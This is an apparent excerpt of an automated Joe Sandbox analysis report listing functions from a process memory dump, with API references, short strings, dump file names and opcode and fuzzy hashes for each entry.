Function 354FCFE0 Relevance: 1.8, APIs: 1, Instructions: 345timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 354FD3A4

Part of subcall function 35568894: RtlDebugPrintTimes.NTDLL ref: 355688F9

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 102649477a04b15f4174991590b9c5440fd697cd0f1563ffcc935922571b53e7
Instruction ID: f31fad710a9d6553ccdec12c97c5fa4f5440728834e16cc73074b01e6aa0a15b
Opcode Fuzzy Hash: 102649477a04b15f4174991590b9c5440fd697cd0f1563ffcc935922571b53e7
Instruction Fuzzy Hash: B0D1D575B043198FEB29CF58C880B9AB7B2BB45314F4240E9D909AB341DB76AD85CF91

Function 3550E5E7 Relevance: 1.8, APIs: 1, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3a3b92d64dd375896c2e0f165fb0ea6da9d9cd0434d430e3be798d44e98822
Instruction ID: e62079cc89624981e5e67868ec64507315e460aa2a74f80de10101a4da192b5a
Opcode Fuzzy Hash: ef3a3b92d64dd375896c2e0f165fb0ea6da9d9cd0434d430e3be798d44e98822
Instruction Fuzzy Hash: E8A1EEB5E44358AFEB21CBA8D844FAEBBB5BF41754F210125E900AB290DB74BD40CBD1

Function 354E1131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 354E1233

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 9bda6a2f8d3f5a3ce7028fc3cc5f6e5082de113bdc71d9356a31ecc235f40034
Instruction ID: 8c563ec8ffb9d330eb7871cbac0bfaac8e954d9b4f02380cbae44dc735798670
Opcode Fuzzy Hash: 9bda6a2f8d3f5a3ce7028fc3cc5f6e5082de113bdc71d9356a31ecc235f40034
Instruction Fuzzy Hash: 9BB100B56093818FD354CF28C880A5AFBF1BF88304F54496EE899D7351D775E945CB82

Function 35502E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON

Download Yara Rule

Strings

0, xrefs: 35503240

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 285f7e170c1022ef0d7792776b96122ba72111774e9b3a65f536ebe4f6dde646
Instruction ID: e0ebc4a2d042454b85a532a17ec4a63beaf87d4efd1d6cbe017c25cbee8fe0e3
Opcode Fuzzy Hash: 285f7e170c1022ef0d7792776b96122ba72111774e9b3a65f536ebe4f6dde646
Instruction Fuzzy Hash: 87F19DB5608742DFEB11CF25C490A5BBBE2BBD8750F46486DE88987240DB34F949CF52

Function 354E7703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0e5f47953dd60e39d21b5d35fdaf74711fa61e01fd63c4c708b0fdfc3ddae61
Instruction ID: 18e39a6500289526e0a0ed5ecf4eb2671080fb8a7f9789851c72920f7400ae5c
Opcode Fuzzy Hash: f0e5f47953dd60e39d21b5d35fdaf74711fa61e01fd63c4c708b0fdfc3ddae61
Instruction Fuzzy Hash: 4D614C75E04646EFDB0CCF69C580AADFBB6BF88250F14826ED419A7300DB70B946CB90

Function 354E2FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

PATH, xrefs: 354E30D6, 354E3124

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: efada49f6742c0cd764db712a032872293ad67bb556499e56a614d8ad6a21670
Instruction ID: d9db968ab79a9c70819f850d113f3d78bff13fa717f2f6d39a0794b25393dc36
Opcode Fuzzy Hash: efada49f6742c0cd764db712a032872293ad67bb556499e56a614d8ad6a21670
Instruction Fuzzy Hash: EAF1AF72E10218DBDB1ACF98D880AAEB7F1FF88711F555069E441AB340EB74BC42CB90

Function 3551F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 896f0a6e74540093dcb3002867d99001aae3fd66123cab7e8c0adb098434aa24
Instruction ID: 371cbcdb5d84a26c51dae4da079697714f1a3b74b03c6c5f8b74ce1300667360
Opcode Fuzzy Hash: 896f0a6e74540093dcb3002867d99001aae3fd66123cab7e8c0adb098434aa24
Instruction Fuzzy Hash: 8A4119B5D01288DFDB14DFA9D480AADBBF4BF48350F50416EE859E7212DB35AA41CFA0

Function 354E262C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 354E2710

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 8b2ebf8969e89329d7825a77c42b55ba19f01c462eaeb8b8b87cd435d5139277
Instruction ID: 902bd4463adde1137afb92949c1d9d3b5aa651bf36e91d017e401d2c3b4e192e
Opcode Fuzzy Hash: 8b2ebf8969e89329d7825a77c42b55ba19f01c462eaeb8b8b87cd435d5139277
Instruction Fuzzy Hash: 2A41B276A09704CFD719EF28C940B49B7F2FF45352F1086AED4069B2A0DB70A942CF91

Function 354DB480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 354DB50C

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 8eab80bd24b2d4336ad4915f222b4f3eb4a4da7e4b9f57d9e40c8a5ddbb1f819
Instruction ID: 68b4aeaeba5e2a102e6c708e805f7a5cd393f0e7aaea270f93b7a675a195b793
Opcode Fuzzy Hash: 8eab80bd24b2d4336ad4915f222b4f3eb4a4da7e4b9f57d9e40c8a5ddbb1f819
Instruction Fuzzy Hash: 8831BE726002049FC715DF18C860A56B7F5BF457A8F5042AEE9455B392DB32ED42CFD0

Function 354E57C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 354E5842

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: e6643280b3ce446b2839cfe29d074c12f95723823332212920ac9e723d44389b
Instruction ID: 59a88a057f9cfe934d462716edf92b9e325120a845690e8aa97016be75188e8b
Opcode Fuzzy Hash: e6643280b3ce446b2839cfe29d074c12f95723823332212920ac9e723d44389b
Instruction Fuzzy Hash: D5316B76715A45EFEB49DB24DA40E89BBB6FF84350F505029E8418BB60DB71F831CB80

Function 354E3616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 354E36A1

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 874f965224284e89241c4544c74e60733c8fdcbde6100695b5f21b8317957493
Instruction ID: 0673dc3275f54d142e8e5200306796819cf14026adebcab4b7e55e489abe4f22
Opcode Fuzzy Hash: 874f965224284e89241c4544c74e60733c8fdcbde6100695b5f21b8317957493
Instruction Fuzzy Hash: B321013620A2509BD7269F28C944B1ABBB1BF85B61F4264ADE8410B740EB71F805CFC1

Function 354E0100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

, xrefs: 354E0255

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-3916222277
Opcode ID: 5dc217c4308d9595731e28f7b1352011679b161a8de0584b126a88860838d1ec
Instruction ID: af5038c3ca05db8f5255aa3435066fe694acecd43a8020f285ce36e1552f7f52
Opcode Fuzzy Hash: 5dc217c4308d9595731e28f7b1352011679b161a8de0584b126a88860838d1ec
Instruction Fuzzy Hash: B8A14A74A08368ABEB1DCA608C51BEE77F56F45345F0440DDECAEAB281CBB4ED458B50

Function 3556A4B0 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3556A51A

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 3aa09c5bdb18718d11c9d46e4f86a5c8b81d0c8380dc734e96e52f83d2db4d25
Instruction ID: 8ce7280f1f26d82715f8c40f6a86a5e4783c5e99a7b1ed58036942fbb22c2d77
Opcode Fuzzy Hash: 3aa09c5bdb18718d11c9d46e4f86a5c8b81d0c8380dc734e96e52f83d2db4d25
Instruction Fuzzy Hash: BE018936610259EBCF128E84DC40ECA3BA6FB4C664F058101FE1866220C636E971EB81

Function 3551A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 355567C9

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: ccb03ceabf729181549984812bab7f3d5318fb4bd7be21293f4bad3ab16130d0
Instruction ID: b0e5e78c509e4f75ae2ef91419a0aab04e5c8ca042c975d4134e599f58291db7
Opcode Fuzzy Hash: ccb03ceabf729181549984812bab7f3d5318fb4bd7be21293f4bad3ab16130d0
Instruction Fuzzy Hash: D7719479E05349DFDF18CFA8C490A9DBBF1BF48360F10852EE806A7240DB71A901CB90

Function 354E973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 354E97F3

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction ID: e000bd2a6b358aa055055ac558a694946d462168229d2027bad0ed94ac7b320d
Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction Fuzzy Hash: 026198B5D04319AFEF15CFA9C840BDEBBB4FF84711F504169E850A72A0DB70AA41CBA0

Function 3556F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 3556F867

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction ID: 8187af587ed6290326f3db83b06deff1d93eba3772cc98f0fa88cfe3919574f4
Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction Fuzzy Hash: 48517C72A08785AFE7118F64C840F6AB7F8FF84758F401929B590D7290EBB5ED44CB92

Function 354FE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 354FE6A4

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 62b69686e9e09519194041e0468e825493a95ee96f7bc6c26f5a55a90ef02ce5
Instruction ID: 5f1301db9302c5ca97d657a379e7c60b047fc1c74cdf69a11adc62aed7ca1324
Opcode Fuzzy Hash: 62b69686e9e09519194041e0468e825493a95ee96f7bc6c26f5a55a90ef02ce5
Instruction Fuzzy Hash: EC41B1B26083419BD758CB79C840B5FB7E8AF88745F80096DF585E7280EB75DA14C793

Function 3555C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 3555C77F

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 7de9f205108ea6e796edae0f92103be86b3ecde39ca92d11da4d620d6be0e01f
Instruction ID: 9b3cceeb718e7e66c9e76ee4a61942b15c3872de051bd93addaae570a7c67329
Opcode Fuzzy Hash: 7de9f205108ea6e796edae0f92103be86b3ecde39ca92d11da4d620d6be0e01f
Instruction Fuzzy Hash: DF4135B1D0152CAEDB11CA50DC80FDEB77CAB45724F4045A6AA09A7140DB70AE8D8F95

Function 3550A470 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

@3]5, xrefs: 3550A5AD, 3554E1D3

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @3]5
API String ID: 0-3319479250
Opcode ID: c0606bc7bbd92a8b2f86528e74d3a30a50f5e3bfff03e5b0cad05dec6fc2faba
Instruction ID: 20b2b52ffc56544151eda26980dc40cd1a0589afca44a3fe2994446bf1c263d7
Opcode Fuzzy Hash: c0606bc7bbd92a8b2f86528e74d3a30a50f5e3bfff03e5b0cad05dec6fc2faba
Instruction Fuzzy Hash: 1641A976A84305CFEF05CF68D890B9DB7B0BB08360F40059AE815BB291DBB4B905CFA0

Function 355697A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 35569870

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 9c0d08411fedbd7cd0dc70ea7d9acec14d964a2332803ef95d4fbd8e6a69b801
Instruction ID: d96fc3b6d5f7e5b4d6c1dc8f2ce2eecd32a9fa82b066c5267f7d59d422aa193e
Opcode Fuzzy Hash: 9c0d08411fedbd7cd0dc70ea7d9acec14d964a2332803ef95d4fbd8e6a69b801
Instruction Fuzzy Hash: 9731B0BAB14342AFD7148F68D860A26B7F5FB88354F90907AE545DF280EB31AC81C790

Function 35517505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 35554622

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: 4861ea47349568aef932cde878a4925d6d3c821ba6b75245db8911611f17ba40
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: 5F41BF79A04616EBEF14CF88C490BBEBBB5FB84351F01445AEC4697240DB30EA41CBE1

Function 355136EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

Flst, xrefs: 35513731

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: Flst
API String ID: 0-2374792617
Opcode ID: bfc704cb2407ff7d229f11c9e9912510b42a2682a7547d0a27a13c8b36a05599
Instruction ID: eac3edffd93ed5945e5b04f02b86545c1ed0e5103892a981bb6e564cf667c241
Opcode Fuzzy Hash: bfc704cb2407ff7d229f11c9e9912510b42a2682a7547d0a27a13c8b36a05599
Instruction Fuzzy Hash: FA419AB5605301DFE704CF18C490A16FFE4FB99720F51896EE85A8F241EB71EA46CB91

Function 3551D530 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

g]5, xrefs: 3551D5DF, 3551D5E3

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: g]5
API String ID: 0-1063336937
Opcode ID: 0cfd0ada63810f8f5c7c0d87456264d2bb1a65df4c80044849b83c44d94dbee4
Instruction ID: 479e96772559ebaa9b0a07ed71db6604d2d6f6164644f2cf7a0582da5310d1b6
Opcode Fuzzy Hash: 0cfd0ada63810f8f5c7c0d87456264d2bb1a65df4c80044849b83c44d94dbee4
Instruction Fuzzy Hash: E621E7B26053049BDA11DB68C940F06BBF9AB84664F510C2AF945D7250EF75F905C7E2

Function 354E5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 354E50BF

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 2a9ff36377505e7a2c8561fb73342d7bc4bbd0b11072ef887ba70845485c43dc
Instruction ID: c1a319e2e1dc75334e0b6c95fe8d0f9f4f07c8ce0ec506c88303d2c6f8b15976
Opcode Fuzzy Hash: 2a9ff36377505e7a2c8561fb73342d7bc4bbd0b11072ef887ba70845485c43dc
Instruction Fuzzy Hash: 661193757097028BFB1E8919D8506EEB396FB81266F30856AF491CB390EEB1DC428781

Function 3552516C Relevance: .8, Instructions: 785COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c867f0f6e3805e45ecca61dc6b8cd1cd99e0a41cdd05847a938e0b9d19c9ea05
Instruction ID: 8083c8b71c59c503e218b7023e74b60994d625e18066b8108f0cd3abbf00c7ab
Opcode Fuzzy Hash: c867f0f6e3805e45ecca61dc6b8cd1cd99e0a41cdd05847a938e0b9d19c9ea05
